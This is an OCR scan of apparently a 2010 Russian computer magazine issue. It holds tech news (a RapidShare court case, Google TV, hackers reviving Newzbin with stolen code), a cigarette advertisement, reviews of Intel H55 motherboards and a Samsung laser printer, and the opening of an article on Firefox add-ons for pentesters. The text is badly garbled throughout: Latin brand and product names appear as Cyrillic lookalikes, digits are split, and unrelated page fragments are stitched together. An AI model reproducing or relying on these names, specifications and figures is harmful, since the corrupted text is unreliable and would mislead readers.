страдают от этого далеко не только 
торрент-трекеры — второй по по- 
пулярности объект пристального 
внимания правообладателей — это 
крупные файлообменники. Немец- 
кий ВарісІЭЬагеуже натерпелся от 
копирастов всякого, ноу компании 
отличные юристы, что и помогает 
«Рапиде» выкручиваться даже из 
самых скверных передряг. Вот и 
в конце мая очередное судебное 
разбирательство против ВарісІЭЬаге 
закончилось полным провалом 
товарищей антипиратов. Немецкий 
суд отмел все обвинения в адрес 
любимой народом файлопомойки, 
постановив, что ВарісІЭЬагедейс- 
твует в рамках закона. Также были 



осмеяны и отвергнуты «креатив- 
ные» предложения истцов — ввести 
на сайте фильтрацию по ключевым 
словам и запретить заливать ВАВ- 
файлы. В кои-то веки справедли- 
вость действительно торжествует. 
Кстати, в конце мая боодіе опубли- 
ковал свой Ьр-1000 рейтингсамых 
посещаемых сайтов. Варісізбагетам 
гордо занимает 40-ю строчку! 



ѵ 

Я АРШИН АНЕ 

ймг пинптмн 
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НИЧЕГО НЕ ВИЖУ. 



НИН 



ОМУ НЕ ПОКАЖУ 



НИЧЕГО 



Многих пользователей раздражает направленное на них«всевидящее око» веб-каме- 
ры, даже если девайс отключен — начитавшись историй про страшных хакеров, народ 
страдает паранойей. В общем-то, эта фобия оправдана, сигнал камеры в самом деле 
можно перехватывать, подсматриваятаким образом за неосторожными гражданами 
(читай нашу статью в Собіпд’е]. Очевидно, специально для тех, кто не может избавить- 
ся отощущения «за мной следят со спутника» китайцы из компании бзои и выпустили 
гаджет, который умеет автоматически закрывать объектив, если камера не работа- 
ет. Веб-кам 030 выполнен в виде человечка-циклопа с объективом вместо глаза. 

Когда камера не используется, человечекзакрывает единственный глаз ручками и 
автоматически открываетего при поступлении видеовызова через 5куре или М5І\І. 
Технические характеристики и цена гаджета, ксожалению, пока неизвестны, но слухи 
утверждают, что, хотя камера и не поддерживает НО, качество картинки она обеспечи- 
ваетхорошее. 



МАШІѴА ВЫСТАВЛЕНА 
НА ПРОДАЖУ 



Циркулирующие по Сети слухи отом, что в компании 
Мапбгіѵа что-то неладно, были частично под- 
тверждены официально. Нет, о смене владельцев 
компании речи не идет, но вотсденьгамиуфран- 
цузов и правда совсем плохо. Финансовый кризис 
у авторов Мапбгіѵа 1_іпих начался еще в 2008 году, и 
на текущий момент дела не просто не выправились, 
но стали совсем плохи — сейчас Мапбгіѵа активно 
ищет покупателей, новых инвесторов и партнеров. 
Впрочем, паниковать не стоит, исполнительный ди- 
ректор Мапбгіѵа АрноЛапревотзаверил обществен- 
ность, что послетого как покупатель будет найден, 
стратегия и курс компании останутся прежними. 
Представители компании вообще отдельно подчер- 
кивают, что Мапбгіѵа находится в поиске инвесторов 
«практически ссамогосвоего основания», и ничего 
страшного не происходит. 



ПЕРВАЯ 30 НО ВИДЕОКАМЕРА 



Японцы каквсегда впереди планеты всей: ком- 
пания 5Ьагр представила на суд публики одну из 
своих последних разработок- первую в мире ЗО 
Н 0-видеокамеру. Главная фишка устройства - его 
крошечные размеры, в силу которых камеру можно 
будет интегрировать в портативные девайсы, будь 
то мобильный тел ефо н , фотоа п п а рат, н етбу к или 
что-то еще. А миниатюрная камера, междутем, 
способна делать фото и вести съемку в НО (720рх2], 
и.таккактехнически камер там две (по сути, захва- 
тывается изображение для правого и левого глаз 
отдельно], на выходе мы получим ЗО-картинку. Мас- 
совое производство этого чуда инженерной мысли 
на ч н ется уже в ко н це те куще го года , та к что ско ро 
узнаем, в какую же сум му обойдется мобильный с 
возможностью почувствовать себя Кэмероном. 
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МЕ6АЫЕѴѴ5 



КЛАВИАТУРА ДЛЯ ЖАРКОГО ЛЕТА И ЖАРКИХ МАТЧЕЙ 

Компания ТЬегтаІІаке, хорошо известная на 
рынке благодаря своим корпусам, блокам пи- 
тания и системам охлаждения, решила удивить 
геймеров и, похоже, ей это удалось — эти ребята 
умудрились оснастить вентиляторами даже кла- 
виатуру! Под маркой ТТеБРОРТБ были выпущены 
сразу два проводных киборда для геймеров: 

СЬаІІепдеги СЬаІІепдегРго. Отличаются модели 
следующими параметрами: СЬаІІепдегРго имеет 
шесть мультимедийных и 18 горячих клавиш (у 
СЬаІІепдег их семь и 1 2 соответственно], 

64 Кб памяти для сохранения индивидуальных 
настроек (против 32 Кб у младшей модели), два 
порта 115В 2.0 (уСЬаІІепдегон один] и красную 
подсветку (в бюджетном варианте отсутст- 
вует]. Атеперь откроем секрет, зачем же нужны 
вентиляторы. Нет, они вовсе не для охлаждения 
клавиатуры — кулеры выдвигаются из верхней 
части клавы и призваны приятно обдувать кисти 
рукво время игры, дабы они не потели :). Цена 
новиноксоставит$55для СЬаІІепдеги $75 для 
СЬаІІепдегРго. 

1 300000 - ПРИМЕРНО СТОЛЬКО РЕКЛАМНЫХ СООБЩЕНИЙ В ДЕНЬ 
ПЕРЕНАПРАВЛЯЮТ ПОЛЬЗОВАТЕЛЕЙ НА ЗАРАЖЕННЫЕ РЕСУРСЫ 




60061-Е ТѴ 

Вездесущий Ооодіе добрался и до телеви- 
зоров. Новый проект Ооодіе ТѴ, который 
уже поддерживаюттакие гиганты как 
5опу и ЬодіІесЬ, откроет телезрителям 
весь спектр интернет-удобств. Ооодіе ТѴ 
в скором будущем будет интегрирован в 
некоторые новые телевизоры, а к старому 
«ящику» гугло-телевиденье можно будет 
подключить, купив специальную телепри- 
ставку (также потребуются НОМІ-разъем и 
доступ к Сети]. Новая платформа позволит 



просматривать ролики на ѴоиТиЬе и других 
сайтах и посещать любые веб-страницы 
с помощью встроенного Ооодіе СЬготе. 

У Ооодіе ТѴ будет и своя система поиска, 
притом не только по интернет-контенту, но 
и по спутниковым (и кабельным] каналам и 
даже контенту некоторых цифровых виде- 
орекордеров. Первые устройства с Ооодіе 
ТѴ на борту появятся в продаже уже осенью 
текущего года. 



1 

і 




Выбери стиль. Оцени качество. 




В мае 20 1 0 года торговая марка Ш 
представила российскому рынку новые 
сигареты Ш Беіесі с угольным филь- 
тром. Ш Беіесі гармонично сочетают в 
себе особую американскую мешку на 
основе лучших сортов табака из восьми 
стран мира, новый угольный фильтр и 
стильную современную пачку с нестан- 
дартной внутренней рамкой, создан- 



ную английскими дизайнерами. 
Сигареты Ш Беіесі можно будет поп- 
робовать в трех версиях: насыщенные 
Ш Беіесі: ВесІ ( 1 0/0,8 мг смолы/ни- 
котина), легкиеі Ш Беіесі ВІие (6/0,5 
мг смолы/никотина) и Ш Беіесі БІІѵег 
суперлегкие2 (4/0,4 мг смолы/нико- 
тина). Ш Беіесі - это сигареты для тех, 
кто ценит стиль и высокое качество. 







Дспд ши- - -* 



ХАК ВО ИМЯ ДОБРА 

С ко пи раста ми сегодня борются далеко не только пиратские партии, и делается 
это не только легальными путями. В марте текущего года из-за жалобы, подан- 
ной в британский суд Ассоциацией кинопроизводителей |МРА|, приказал долго 
жить популярный УзепеІ- поисковик МеѵѵгЬіп. Ресурс сначала обязали прекра- 
тить индексировать фильмы и программы, принадлежащие МРА, а затем обло- 
жили штрафом, что и привело кего смерти. И вот, несколько месяцев спустя, 
пользователям погибшего сервиса пришли письма от некой ха к- труп п ы «Теат Р 
й о д б » , в которых хакеры обещают возродить МеѵѵгЬіп в лучшем виде. Предста- 
витель хакеров Мг.ѴѴЫіе объясняет, что в руки их команды каким-то образом по- 
пали большая часть исходного кода и базы данных ресурса. Возможность такого 
поворота событий подтвердил и йеерЗНагег - бывший редактор поисковика. По 
его словам, серверы действительно ломали и исходники могли быть украдены. 

В своем письме хакеры горячо заверили общественность, что «слишком любили 
МеѵѵгЬіп, чтобы просто позволить ему умереть», и пообещали запустить Ме\д/2Ьіп2 
в самом ближайшем будущем. 




5 МИЛЛИОНОВ ЧАСОВ ПРОВЕЛИ ПОСЕТИТЕЛИ ЗА ИГРОЙ В РАС-МАИ. 
РАЗМЕЩЕННОЙ НА ГЛАВНОЙ СТРАНИЦЕ 6006І.Е В ЧЕСТЬ 30-ЛЕТИЯ ИГРЫ 





Іпзрігіпд Іппоѵаііоп • Регзізіепі РегТесІіоп 



его беспроводного комфорта 
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32 НАНОМЕТРОВ 

ТЕСТИРОВАНИЕ СИСТЕМНЫХ ПЛАТ НА БАЗЕ НОВОГО ЧИПСЕТА ШТЕІ. 



Одновременно с выходом 32-нанометровых процессоров архитектуры ѴѴезІтеге 
компания Іпіеі представила линейку чипсетов Н55/57 Ехргезз. Основные игроки рынка 
системных плат, разумеется, выпустили на его основе свои продукты. В данной статье 
мы рассмотрим ключевые модели и определим среди них лучших из лучших. 



В ЧЕМ РАЗНИЦА? 

Перед тем, как выбрать себе системную плату на одном из чипсетов Іпіеі 
Н55/Н57 Ехргезз, было бы неплохо понять, чем же они отличаются. Набор 
микросхем Іпіеі Н57 Ехргезз является старшим из двух новых чипсетов 
и предназначен для работы со всей линейкой процессоров Іпіеі Соге, 
начиная отіЗ изаканчивая І7. Так как контроллеры памяти и шины РСІ 
Ехргезз расположены непосредственно в центральном процессоре (также, 
каки графическое ядро], то чипсет отвечает за работу интерфейсов ОѴІ, 
ОізрІауРогі(поддерживаеттехнологию НОСР] и НОМІ.атакже шести портов 
ВАТА, контроллера РАЮ, четырнадцати разъемов 115В, сетевого и звукового 
контроллеров, атакжедополнительныхлиний шины РСІ Ехргезз в количес- 
тве восьми штук. Младшая модель — Іпіеі Н55 Ехргезз — отличается от Н57 
отсутствием РАЮ-контроллера итем, что в нем стало меньше портов шины 
РСІЕхргеззхІ (на две штуки). 

МЕТОДИКАТЕСТИРОВАНИЯ 

Главной задачей тестирования системных плат мы определили проверку 
скорости и стабильности их работы, а путь та кой проверки только один и 
называется он оверклокингом. Мы увеличивали производительность путем 
повышения опорной частоты ВСЕКдо уровня 214 МГц(4922\23]. После про- 
ведения данного мероприятия мы за пускал и та кие бенчмарки, какЗирегРІ 
1 .5X5 со значением 1 М.ѵѵРгіте 2.0 со значением 32М, а также тесты стабиль- 
ности системы из пакета программ Еаѵаіуз Еѵегезі Шіітаіе Ебіііоп. 



ТЕСТОВЫЙ СТЕНД 

Процессор, ГГц: 3 . 06, 1 п^еі Соге іЗ -540 
Оперативная память, Гб: 2 x 2 , беіі Віаск Огадоп 
Видеоплата, Мб: 51 2 , АТІ Расіеоп НО 5670 
Жесткий диск, Тб: 1 . 5 , 5 еада 1 :е Ваггасисіа 
5 Т 31 500341 А 5 

Процессорный кулер: ІЧосШа N 14-014 
Блок питания, Вт: 1 000 , 2 АІ_МАЫ 2 М 1 000 -НР 
ОС: ѴѴіпсІоѵѵаХР РгоТеааіопаІ, 5 РЗ, х 32 



ВСІ.К, МГЦ 

М5ІН55-6065 
АБРоскНббМРго 
А51І5 Р 7 Н 55 -М Рго 
СідаЬуіе 6 А-Н 55 М-ІЮ 2 Н 
ЕС5Н55Н-СМ 
Рохсопп Н55МХ-5 

О 50 100 150 200 250 300 

Наибольший разгонный потенциал демонстрируют платы отАБІІБ 
и МБІ 



ѴѴШРАР 

МБІ Н55-СШ65 Ь 

АБРоскНббМРго . 

А51І5 Р7Н55-М Рго . 

ОідаЬуІе СА-НббМ-и02Н . 

ЕСБНббН-СМ ■ 

Рохсопп НббМХ-5 и 

о 

■ ѵѵіп КАР 3.9 ■ ѵѵіп РАР 3.9 (ОС) 

Оверклокинг существенно повысил результаты теста ѴѴіпРАР 



1000 2000 3000 

Кбайт/с 
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ВЫЧИСЛЕНИЕ ЧИСЛА «ПИ» 



МЗІН55-С065 
АБРоскНббМРго 
А51І5 Р 7 Н 55 -М Рго 
СідаЬуіе 6А-НббМ-и02Н 
ЕС5Н55Н-СМ 
РохсоппНббМХ-Б 

, , 0 5 

■ ѵѵРгіте 2.00 32т (ОС), с с 

■ БирегРі 1.5X5 1т (ОС), с ■ ѵѵРгіте 2.00 32т, с 



Как видно, платы показывают схожие результаты до разгона 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: ІЫТЕЕ Н55 ЕХРРЕ55 

СОКЕТ: ЮА 1 1 56 

ПАМЯТЬ, ГБ: 16, 4ХООВЗ, 1066 - 2133 МГЦ 

ДИСКОВЫЕ КОНТРОЛЛЕРЫ: 1ХЮЕ, 6Х5АТАЗ ГБИТ/С 

СЛОТЫ РАСШИРЕНИЯ: 1ХРСІ-ЕХ16, 1ХРСІ-ЕХ1 , 2ХРСІ 

ЗАДНЯЯ ПАНЕЛЬ: О-ВСВ, ОѴІ, НОМІ, 6ХІІ5В 2.0, 5Р0ІЕ, РЗ-45, Р5/2 

АУДИО: 7.1 ЕЮА РЕАПЕК 

СЕТЬ: ѲІѲАВІТ ЕТНЕРІЧЕТ 

ФОРМ-ФАКТОР: 245X245 ММ, МАТХ 



15 20 

БирегРі 1.5X5 1т, с 



ЕѴЕРЕЗТ: ТЕСТ ПАМЯТИ 



МБІН55-С065 
АБРоскНббМРго 
А51І5 Р 7 Н 55 -М Рго 
ОідаЬуІе 6А-Н55М-1Ю2Н 
ЕСБНббН-СМ 
Рохсопп НббМХ-5 




0 5000 10000 

Мбайт/с 



15 000 



■ ЕѵегезІтетогусору(ОС) і Еѵегезі тетогу геасі (ОС) ■ Еѵегезі тетогуѵѵгііе 

■ Еѵегезі тетогуѵѵгііе (ОС) ■ Еѵегезі тетогусору ■ Еѵегезі тетогу геасі 



оск Н55 
Рго 



Разгон позволяет значительно увеличить результат синтетического 



теста Еѵегезі 




АЗРОСК 

Н55МРР0 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: ІІМТЕЕ Н55 ЕХРРЕ55 

СОКЕТ: ЮА 1 1 56 

ПАМЯТЬ, ГБ: 1 6 , 4Х ООРЗ, 1 066-2600+ М ГЦ 

ДИСКОВЫЕ КОНТРОЛЛЕРЫ: 5Х5АТАЗ ГБИТ/С 
СЛОТЫ РАСШИРЕНИЯ: 1 ХРСІ-Е XI 6, 1 ХРСІ-Е XI 6 (РЕЖИМ Х4], 1ХРСІ-Е 
XI , 1ХРСІ 

ЗАДНЯЯ ПАНЕЛЬ: О-ВІЮ, ОѴІ, НОМІ, 5ХІІ5В 2.0, Е5АТА/ІІ5В, ЕІРЕѴѴІРЕ, 

5РОІЕ, РЗ-45, Р5/2 

АУДИО: 7.1 Н ИА VI А ѴТ 171 85 

СЕТЬ: ѲІѲАВІТ ЕТНЕРІЧЕТ 

ФОРМ-ФАКТОР: 244X244 ММ, МАТХ 



□ □□ 



□ □ 



+ + 



Тайваньские инженеры из компании АЗІІ5 одними из первых выпустили 
на рыноксистемную плату под процессоры Сіагксіаіе, и, надо сказать, 
получилась она достаточно удачной. Сразу видно, что над разводкой 
компонентов думали внимательно, поэтому каждый элемент находится 
на своем месте. Никаких претензий тут нет. С разгоном всетоже полу- 
чилось весьма неплохо, по опорной частоте мы смогли выйти на рубеж в 
206 МГц, что и объясняет высокие показатели в тестах. Для тех, кто пока 
не умеет разгонять систему через ВІ05, производител ь создал техно- 
логиюТигбо V, которая позволяет произвести оверклокингс помощью 
удобного интерфейса. 



Видимо, компанию АВРоск уже не устраивает имидж производителя 
бюджетных решений, и она решила его поменять, выпуская достаточно 
серьезные и дорогие платы. Например, на АЗВоск Н55М Рго установле- 
ны качественные конденсаторы, да и разводка остальных компонентов 
выполнена весьма и весьма неплохо. На этой плате можно реализовать 
и спарку графических плат по технологии АТІ СгоззЕігеХ, но если ты этим 
займешься, то помни, что вторая видеоплата закроет собой слоты РСІ-Е 
хі и РСІ. Говоря о производительности можно сказать, что по опорной 
частоте мы вышли на 1 93 МГц, что, конечно, не выдающийся, но вполне 
нормальный результат. 



Как и у всех устройств АЗІІЗ, цена данной платы несколько выше, чем у 
аналогичных девайсов конкурентов. Крометого, очень бы хотелось ви- 
деть разъем РСІ Ехргезз х4, а также, учитывая оверклокерские возмож- 
ности, нормальные качественные конденсаторы, а нете дешевые, что тут 
установлены. 



Все же в процессе тестирования были найдены некоторые недостатки 
в разводке устройства. Например, если ты любитель мощных охлади- 
тельных систем, то он перекроет собой восьмипиновый коннектордля 
шлейфа блока питания. Крометого, длинная графическая плата мешает 
открытию защелок слотов памяти. 
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РЕВКІІМ 



] гл 

В065 

пзипд 



ЕС5 

Н55Н-СМ 



РОХСОМИ 

Н55МХ-5 



Затзипд 

Р580 



АЬЦЬ Н/НЬЬ- 

М Рго 



ЕС5 Н55Н-СМ 



М5І Н55-6Р65 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: ІІ\ІТЕІ_ Н55 ЕХРРЕ55 
СОКЕТ: І_ЭА 11 56 

ПАМЯТЬ, ГБ: 1 6, 4ХОБРЗ, 1 066/1333 

ДИСКОВЫЕ КОНТРОЛЛЕРЫ: 6Х5АТА 3 ГБИТ/С 
СЛОТЫ РАСШИРЕНИЯ: 1ХРСІ-ЕХ16, 2ХРСІ-ЕХ1, 1ХРСІ 
ЗАДНЯЯ ПАНЕЛЬ: 0-51ІВ, ЕЮМІ, 6ХІІ5В 2.0, ЕЦ-45, 2ХР5/2, І_РТ 
АУДИО: 5.1 НОАРЕАЬТЕКАІ_С662 (ОПЦИОНАЛЬНО 7.1 ВЕАЫЕК 
АБС888І 

СЕТЬ: 6І6АВІТ ЕТНЕРЫЕТ 
ФОРМ-ФАКТОР: 244X244 ММ, МАТХ 

■■■■■■■□□□ 

+ 

Пример неплохой системной платы, предназначенной для использования 
в офисном компьютере. Она поддерживает установку до 16 Гб оперативной 
памяти в 4 слота и имеет два слота РСІ-ЕхІ для установки дополнительных 
устройств. Жесткие диски можно подключить в шести портах 5АТА. Проб- 
лем с разводкой практически нет. 

Разве что, если офисный ПК будет нуждаться в видеоплате, она 
будет сталкиваться с защелками на слотах памяти, да и один из двух 
слотов РСІ Ехргезз хі станет недоступен. Возможности оверклокин- 
га, как и положено офисной плате, очень небольшие: в В 105 даже 
отсутствует нужная вкладка, пользователю можно только менять 
частоту ВС БК, причем без изменения напряжения и таймингов 
памяти. В нашем случае результат разгона составил 160 МГц, и то 
в основном благодаря возможностям памяти и ЦП, а не системной 
платы. 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: ІІ\ІТЕІ_ Н55 ЕХРРЕ55 
СОКЕТ: БОА 11 56 

ПАМЯТЬ, ГБ: 8, 2ХООРЗ, 1066/1333 

ДИСКОВЫЕ КОНТРОЛЛЕРЫ: 6Х5АТАЗ ГБИТ/С 

СЛОТЫ РАСШИРЕНИЯ: 1ХРСІ-ЕХ16, 1ХРСІ-ЕХ4, 2ХРСІ 

ЗАДНЯЯ ПАНЕЛЬ: ОѴІ, НЮМІ, 6ХБІ5В 2.0, 5Р0ІЕ, СОМ, РЖ45, Р5/2 

АУДИО: 7.1 НБА РЕАБТЕК АБС8885 

СЕТЬ: 0І6АВІТ ЕТНЕРЫЕТ 

ФОРМ-ФАКТОР: 244X21 8 ММ, МАТХ 

■■■■■■■□□□ 

+ 

Несмотря на свою невысокую цену, которая является основным дос- 
тоинством данного устройства, те, кто ее приобретут, получат довольно 
функциональный девайс, который по своим основным параметрам ни 
в чем не уступает изделиям конкурентов. Присутствует на нем и слот 
РСІ Ехргезз х4, который может быть занят как второй видеоплатой (что 
маловероятно в случае офисной машины], так и неким периферийным 
устройством. 

Основные недостатки устройства — это малое количество слотов для 
памяти и слабый разгонный потенциал. Несмотря на то, что форм-фактор 
этой платы тАТХ, четыре слота для памяти разместить было бы реально, 
атакихтолько два, и максимальный объем ОЗУ равен 8 Гб. С разгоном 
все обстоитеще мрачнее, таккакв ВІОЗдаже нет соответствующего 
раздела, разрешенотолько менять тайминги и значения множителей 
памяти. Добавив кэтому недорогие конденсаторы, мы получим типичную 
офисную системную плату. 



► 018 
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АЗРоск Н55М Рго 




даЬуІе СА- 
55М-1Ш2Н 



ВідаЬуІе 6А- 
Н55М-1Ш2Н 



6І6АВУТЕ 

6А-Н55М-1Ш2Н 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: I ЫТЕЬ Н55 ЕХРНЕ55 

СОКЕТ: ЮА 1 1 56 

ПАМЯТЬ, ГБ: 1 6, 4ХООРЗ, 800 - 2200+ 

ДИСКОВЫЕ КОНТРОЛЛЕРЫ: 1ХЮЕ, 1ХЕ00.5Х5АТА 

СЛОТЫ РАСШИРЕНИЯ: 2ХРСІ-Е XI 6, 2ХРСІ 

ЗАДНЯЯ ПАНЕЛЬ: 0-5НВ, ОѴІ, НОМІ, П15Р1_АУР0РТ, 6ХІІ5В 2.0, 

ЕІРЕѴѴІВЕ, 5Р0ІЕ, Е5АТА, РЗ-45, Р5/2 

АУДИО: 7.1 НйА РЕАПЕКАЮ889 

СЕТЬ,: 6І6АВІТ ЕТНЕРІЧЕТ РЕАЮЕК РП81 1 1 0 

ФОРМ-ФАКТОР: 244X230 ММ, МАТХ 



■■■■■■■□□□ 

+ 

Тем, кто любит быструю память, обязательно стоит обратить свое внима- 
ние на эту системную плату, так как она поддерживает модули ОЗУ РОРЗ 
с рабочей частотой до 2133 МГц. Нотолько при использовании процес- 
соров I пЕеІ Соге І5 и і 7, в которых нет видеоядра, в противном случае мак- 
симальная частота памяти составит только 1066 МГц. Крометого, плата 
поддерживает режим АТІ СгоззЕігеХ, что при необходимости позволит 
создать массив видеокарт. Если же ты собираешься заняться разго- 
ном, то тебе наверняка придется по вкусу фирменная технология Шга 
ОигаЫе 3, которая включает в себя очень качественные комплектующие 
энергосистемы платы. 

Но, несмотря на стольхороший старт, наше разгонноетестирование 
оказалось не оченьуспешным, частоту удалось поднять только до 
165 МГц, что для такой платы от В ідабуію является крайне низким резуль- 
татом. Видимо, любителям ЕР5 придется прикупать быструю память и 
две видеоплаты, а не надеяться на успешный оверклок. 



М5І 

Н55-6065 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: ІЫТЕЕ Н55 ЕХРРЕ55 

СОКЕТ: ЮА 1 1 56 

ПАМЯТЬ, ГБ: 1 6 , 4ХООРЗ, 1 066-2133+МГЦ 

ДИСКОВЫЕ КОНТРОЛЛЕРЫ: 1ХЮЕ, 7Х5АТА 

СЛОТЫ РАСШИРЕНИЯ: 2ХРСІ-ЕХ16, 2ХРСІ-ЕХ1 , 2ХРСІ 

ЗАДНЯЯ ПАНЕЛЬ: 0-51ІВ, ОѴІ, НОМІ, 6ХІІ5В 2.0, ЕІРЕѴѴІВЕ, 5Р0ІЕ, 

ЕЗАТА, РЗ-45, 1ХР5/2 

АУДИО: 7.1 НРА РЕАІ_ТЕК АЮ889 

СЕТЬ: ѲІѲАВІТ ЕТНЕРІЧЕТ, РЕАЕТЕК81 1 1 РЕ 

ФОРМ-ФАКТОР, ММ: 305X225, АТХ 



■■■■■■■■■□ 

+ 

Форм-фактор АТХ, в котором выполнена эта системная плата, позво- 
лил производителю разместить на ней массу полезных компонентов, 
которые включают в себя портеЗАТА, множество слотов расширения, 
внешнюю клавишу перезагрузки системы и много других нужных и по- 
лезных вещей. При этом к распайке компонентов невозможно придрать- 
ся, все сделано достаточно грамотно. Но основное достоинство данной 
системной платы — ее разгонный потенциал. На ней и только на ней мы 
смогли поднять тактовую частоту процессора до рекордных 4876 МГц, что 
является поистине феноменальным результатом. Не скрывая гордости, 
отметим, что на момент написания статьи это был лучший показатель для 
данного процессора при оверклоке с воздушным охлаждением. 

Цена устройства существенно превышает среднюю стоимость плат в 
обзоре. С другой стороны, онотого стоит. 
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РЕВВІІЛЛ 



I Сергей Никитин 




ТЕСТИРОВАНИЕ МОНОХРОМНОГО ЛАЗЕРНОГО 
ПРИНТЕРА ЗАМЗІЖЗ ММ660 

Современные технологии позволяют во много раз уменьшить габариты 
множества привычных для нас вещей, при этом сохраняя их качество 
и функционал. В первую очередь эта тенденция, конечно же, касается 
электроники. Переход на новыетехпроцессы позволяет нам получать 
более мощные компоненты, более миниатюрные нетбуки и сотовыете- 
лефоны. Это привычная миниатюризация. Но есть и несколько нестан- 
дартная — например, компактные периферийныеустройства. Компания 
Эатзипд выпустила монохромный лазерный принтер М 6 - 1 660 , который 
называют самым маленьким устройством такого класса. Меньше габа- 
риты — меньше занято места на столе. Малогабаритное устройство про- 
ще носить с собой. Мы заинтересовались возможностями такого девай- 
са и провели еготщательноетестирование. 
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ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 



• Разрешение, сірі: 1200x600 

• Скорость печати, стр\мин: 16 

• Время выхода первого отпечатка, сек: 0 

• Емкость лотка для бумаги, листов: 150 

• Габариты, мм: 321x224x101 

• Вес. кг: 4.2 



МЕТОДИКА ТЕСТИРОВАНИЯ 

Для проверки скорости и качества печати была использована наша 
стандартная тестовая страница, которая включает в себя наиболее часто 
применяемые пользователями в повседневной работе документы: текст 
разного размера и шрифтов, таблицу, диаграмму и фотографию. После 
установки принтера, драйверов и необходимого программного обеспе- 
чения запускалась печать стандартной тестовой страницы. После этого 
мы распечатывали 10 экземпляров нашей тестовой страницы и засекали 
время выхода первого отпечатка и общее время выполнения задания. 
Крометого, мы обращали внимание на внешний видустройства, комплект 
поставки, шумность при работе и удобство эксплуатации девайса. 

ВНЕШНИЙ ВИД 

Какими бы ни были размеры устройства, его внешний вид все равно инте- 
ресен и немаловажен для пользователей, особенно если предполагается 
использование дома. Внешность принтера Затзипд МИ- 1660 весьма 
приятная. Корпус действительно очень компактный, линии плавные, 
углы скруглены. Корпус принтера окрашен черным и серым цветами. В 
итоге мы получаем классический экстерьер устройства, которое можно 
поместить в любой домашний или офисный интерьер, не заботясь при 
этом, впишется ли оно в него. Когда принтер находится в неразвернутом 
состоянии, он похож на небольшой пластиковый кубик, из которого ниче- 
го неторчит. Учитывая его небольшие размеры и вес, его можно исполь- 
зовать даже в качестве мобильного печатающего устройства в тех местах, 
где есть компьютер и свободная электрическая розетка. Конечно, в пакет 
он не поместится, а потребует для транспортировки отдельной сумки, 
но, если это действительно нужно, то его вполне можно носить с собой, 
причем с гораздо большим комфортом, нежели большинство аналогов. 
Длятого, чтобы привести принтер в рабочее состояние достаточно разло- 
жить лотки для бумаги и все будет готово. Понятно, что эта процедура не 
вызовет ни у кого каких-либо проблем. 

А НТО ОН УМЕЕТ? 

Конечно, он умеет печатать, но об основной функции Затзипд МИ- 1660 
мы поговорим немного позже, а сейчас коснемся его дополнительных 
функций. Панельуправления из нескольких кнопоки индикаторов распо- 
ложена на верхней панели устройства. Клавиша включения\выключения 
питания имеети еще одну функцию: переводитустройство в режим эконо- 
мии электроэнергии, который поможеттебе сохранить средства, идущие 
на оплату коммунальныхуслуг, продлит срок службы устройства (так как 
ни одно из них не радуется постоянным включениям и выключениям], а 
также обрадует всех «зеленых» на планете. Вторая кнопка также подарит 



много интересных возможностей, она существенно облегчает процесс 
печати. Нажав на нее один раз, ты через некоторое время увидишь рас- 
печатку того, что в текущий момент находится на экране, а подержав ее 
подольше, распечатаешьтолько содержимое активного в данный момент 
окна. Согласись, это довольно удобно! Расширяет возможности печати 
и программное обеспечение Затзипд АпуѴѴеЬ Ргіпі, которое входит в 
комплект поставки устройства. Благодаря этому ПО распечатка понра- 
вившихся элементов с бескрайних просторов интернета станет гораздо 
проще и удобнее. Тебе достаточно будет перетащить понравившиеся 
картинки или что-то иное на специальную панель печати твоего браузера, 
при необходимости провести небольшую редактуру и нажать Ргіпі! Так что 
этот малыш способен на нечто большее, чем просто печать, он делает ее 
гораздо более удобной. 

ОСНОВНАЯ ФУНКЦИЯ 

Кактыуже понял, Затзипд МІ_-1660 не просто печатает, а делает это по- 
разному, да и ктомуже оченьудобно. А вот какон это делает? Наконец-то 
мы подошли к ответу на главный вопрос. Распечатка 10 экземпляров 
наш их тестовых страниц заняла у принтера 45,6 секунд, причем пер- 
вая страница появилась на светчерез обозначенное производителем 
время — 8 секунд, что в наше время повального маркетинга является 
довольно редким явлением. Полученные результаты можно считать очень 
хорошими нетолько потому, что цифры говорят сами за себя, но и еще по 
нескольким причинам, главная из которых — это качество печати. Мы 
внимательно изучили отпечатки и увидели, что даже самый маленький 
шрифт пропечатан очень четко, черный цвети оттенки серого естествен- 
ны и насыщенны, а на изображении отсутствуют какие-либо артефакты, 
чем обычно грешатлазерные принтеры. Крометого, процесс печати 
проходит практически при полнойтишине.тоестьпринтер не издаетпри 
работе никакого шума сверх необходимого . И это не может не радовать. 
Какбы хорошо не печатал принтер, но рано или поздно у него закончится 
тонер и придется поменять картридж. Несмотря на небольшие габариты 
МИ-1 660, эта процедура проходит без каких-либо проблем, просто и удоб- 
но, какулазерных принтеров более существенных габаритов. 

ВЫВОДЫ 

У компании Затзипд получился очень и очень неплохой и интересный 
принтер. Оставив на совести разработчиков слова о его самых маленьких 
в мире габаритах, можно смело говорить отом, что он действительно 
очень компактен, и при большой нужде его можно носить с собой. Ско- 
рость работы и качество печати на высоте, так что твои инвестиции никак 
уж не пропадут даром. Адополнительные возможности в области печати и 
энергосбережении делают его еще более привлекательным, т 
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РІКЕРОХ-УБИИЦА 



Собираем хакерскую сборку плагинов 
для Могіііа 



Как ни крути, основная прелесть Ріге^ох'а заключается в расширяемости. Плаги- 
ны можно найти на любой случай жизни: чтобы блокировать рекламу, эффектив- 
но отлаживать веб-приложения, быстро переключать прокси и что угодно еще. 
Особенно приятно, что за годы разработки появилась целая подборка особенных 
аддонов - тех, которые могут сослужить хорошую службу пентестеру. 



Д а, в описании плагина никогда не будет 
написано: «Это аддон для того, чтобы 
ломать сайты». Зато плагинами можно 
заменить массу отдельных х-іюоіг и 
выполнять многие действия прямо в 
браузере. Для того, чтобы отследить и подделать 
НТТР-заголовки, поиграться с кукисами, 
проспуфить ІІзег-АдепІ, сделать Нпдегргіпі- 
іпд сорцов страницы, чтобы понять с каким 
движком на сервере имеешь дело, достаточно 
установить плагин. Надо только знать какой. 

